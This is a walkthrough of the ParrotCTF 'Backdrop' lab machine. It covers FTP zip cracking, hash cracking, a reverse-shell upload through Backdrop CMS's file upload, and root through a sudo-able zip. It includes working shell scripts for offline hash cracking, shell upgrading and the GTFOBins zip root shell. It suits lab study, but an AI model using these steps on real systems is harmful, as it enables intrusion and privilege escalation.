ParrotCTF Backdrop: Detailed Walkthrough

Parth

This room focuses on leveraging several misconfigurations and gaining initial access through the CMS admin dashboard. It requires a little research, but it is a relatively straightforward machine.
Access the machine here. Let's dive in!

Enumeration:

Let's start with a basic Nmap scan.

We find three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP). Let's enumerate each service in turn.

1. FTP/21

We can log in anonymously. Listing the directory reveals a zip file. Let's download it to our local machine.

Now, let's unzip the file.

Whoops, it asks for a password.
No worries, John the Ripper comes to the rescue: zip2john turns the archive into a crackable hash, and john recovers the password from a wordlist.

Boom! We got the password. Let's unzip the archive. Inside we find a list of backup credentials.

We have three pairs of credentials, but the passwords are stored as hashes. Let's use crackstation.net to crack them.
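crackstation.net is just a very large lookup table of unsalted hashes; the same thing can be done offline with a wordlist. The script below is an added example and not part of the original walkthrough: it takes `user:hash` lines in the shape of the backup-credentials file, picks the digest algorithm from the hash length (32 hex chars = MD5, 40 = SHA-1, 64 = SHA-256, an assumption since the post does not say which format the file used), and tries every word in a wordlist. The credential lines and the tiny wordlist are constructed for the demo; point `WORDS_FILE` at rockyou.txt for a real run. It assumes GNU coreutils (`md5sum`, `sha1sum`, `sha256sum`).

```shell
#!/bin/sh
# Added example: offline wordlist attack on unsalted hashes from a
# "backup credentials" dump. Not the walkthrough author's code.
# Assumes GNU coreutils hashing tools; the sample data below is constructed.

# Pick the hashing tool from the hex digest length (an assumption about the
# dump's format: unsalted MD5 / SHA-1 / SHA-256). Returns 1 for anything else.
hash_tool() {
    case ${#1} in
        32) echo md5sum ;;
        40) echo sha1sum ;;
        64) echo sha256sum ;;
        *)  return 1 ;;
    esac
}

# crack_hash HEX WORDLIST: prints the matching word and returns 0,
# or returns 1 when no word in the list produces the digest.
crack_hash() {
    h=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    tool=$(hash_tool "$h") || return 1
    while IFS= read -r word; do
        # printf '%s' avoids hashing a trailing newline, which would never match
        [ "$(printf '%s' "$word" | "$tool" | cut -d' ' -f1)" = "$h" ] &&
            { printf '%s\n' "$word"; return 0; }
    done < "$2"
    return 1
}

# crack_creds CREDS_FILE WORDLIST: one "user:plaintext" line per input line,
# with "<not cracked>" for hashes the wordlist does not cover.
crack_creds() {
    while IFS=: read -r user hash; do
        if pw=$(crack_hash "$hash" "$2"); then
            printf '%s:%s\n' "$user" "$pw"
        else
            printf '%s:<not cracked>\n' "$user"
        fi
    done < "$1"
}

# --- constructed demo data ---------------------------------------------------
CREDS_FILE=$(mktemp)
WORDS_FILE=$(mktemp)
trap 'rm -f "$CREDS_FILE" "$WORDS_FILE"' EXIT

# md5("admin"), sha1("password"), sha256("123456"), and a junk MD5-length value
printf '%s\n' \
    'alice:21232f297a57a5a743894a0e4a801fc3' \
    'bob:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8' \
    'carol:8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92' \
    'dave:ffffffffffffffffffffffffffffffff' > "$CREDS_FILE"

printf '%s\n' letmein admin password 123456 > "$WORDS_FILE"

crack_creds "$CREDS_FILE" "$WORDS_FILE"
```

Running it prints `alice:admin`, `bob:password`, `carol:123456` and `dave:<not cracked>`. The last line is the case to watch for on a real box: a hash that does not crack may be salted (then the length-based guess is wrong and you need a format-aware tool like john or hashcat), or simply not in the wordlist.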

2. HTTP/80

First, let's open the webpage.

I checked the page source and robots.txt but didn't find anything significant. Let's use feroxbuster to brute-force the directory structure.

There isn't much of interest, apart from a login page. Let's try the credentials we cracked earlier. And boom! We're in.

Now the main question is how we get a reverse shell. After some research, I found an exploit for an unrestricted file upload in Backdrop CMS. Follow the steps in this post to upload a PHP file containing a reverse shell; revshells.com will generate the PHP payload for you.

The uploaded file ends up under the web root in the layouts directory, so it executes as PHP when requested. With a listener waiting on your attacking machine, trigger it by opening the file in the browser:
URL: http://machine-ip/layouts/harris_flexible/filename.php

Nice! We got the reverse shell. Now, let's stabilize it.

Privilege Escalation:

We've got a shell as www-data. We need to escalate from www-data to Alison, and then to root. By enumerating the machine further, I found that we have read access to Alison's files. Let's grab the user flag.

Nice!

www-data to Alison:

We could run linpeas on the machine, but for CMS-based boxes I usually check the /var/www directory first; credentials are often lying around in config or backup files there. In this case, I found a hidden file in /var/www/html/files.

The file contains Alison's creds.

Alison to root:

Now that we are Alison, let's enumerate the box manually. Running sudo -l, we see that we can run the zip command with root privileges. We can exploit this using the sudo technique for zip from GTFOBins.

Entering these commands in the shell gives you root access. GG!
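The three post-exploitation steps above (upgrading the raw reverse shell, reading `sudo -l`, and abusing `zip`) are collected in the script below. It is an added example, not the walkthrough author's commands. The `sudo -l` output it parses is constructed to mirror what the post describes (zip runnable as root); the exact wording on the real box may differ, which is why the parser only keys on the "may run the following commands" banner and the `(user)` lines that follow it. The zip trick itself is the GTFOBins one: `-T` makes zip test the archive it just wrote and `-TT` replaces the test command with one of our choosing.

```shell
#!/bin/sh
# Added example (not the walkthrough author's code): from a dumb www-data
# reverse shell to root via a sudo-able zip. The sudo -l sample is CONSTRUCTED.

# Step 1: upgrade the reverse shell to a PTY. Run this inside the reverse shell,
# press Ctrl-Z, then on the attacking terminal run:  stty raw -echo; fg
# and finally:  export TERM=xterm
upgrade_tty() {
    python3 -c 'import pty; pty.spawn("/bin/bash")' 2>/dev/null ||
        script -qc /bin/bash /dev/null   # fallback when python3 is missing
}

# Step 2: parse `sudo -l` (on stdin) and print every binary we may run via sudo.
# Only lines after the "may run the following commands" banner count; on each
# "(user) [NOPASSWD:] cmd, cmd" line the absolute paths are the permitted commands.
sudo_allowed_bins() {
    awk '/may run the following commands/ { found = 1; next }
         found && /^[[:space:]]*\(/ {
             for (i = 1; i <= NF; i++)
                 if ($i ~ /^\//) { sub(/,$/, "", $i); print $i }
         }'
}

# Step 3: GTFOBins sudo/zip. zip, running as root, writes the archive, then
# "tests" it by running our -TT command; the trailing "#" comments out the
# archive path zip appends to that command, leaving a root sh.
zip_root_shell() {
    tf=$(mktemp -u)
    sudo zip "$tf" /etc/hosts -T -TT 'sh #'
    sudo rm -f "$tf"
}

# Constructed sample of `sudo -l` output, shaped like the box described above.
SAMPLE_SUDO_L='Matching Defaults entries for alison on backdrop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User alison may run the following commands on backdrop:
    (ALL) NOPASSWD: /usr/bin/zip'

# Demo: decide whether the zip trick applies before firing it.
if printf '%s\n' "$SAMPLE_SUDO_L" | sudo_allowed_bins | grep -qx '/usr/bin/zip'; then
    echo "zip is runnable via sudo: call zip_root_shell for a root shell"
fi
```

On the target, replace the sample with `sudo -l | sudo_allowed_bins`; if `/usr/bin/zip` appears, `zip_root_shell` drops you into a root shell, after which `rm -f` cleans up the archive it created.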

I hope you find this write-up helpful.
In case of any queries, feel free to contact me on X @hey_parthhh.

Happy Hacking!
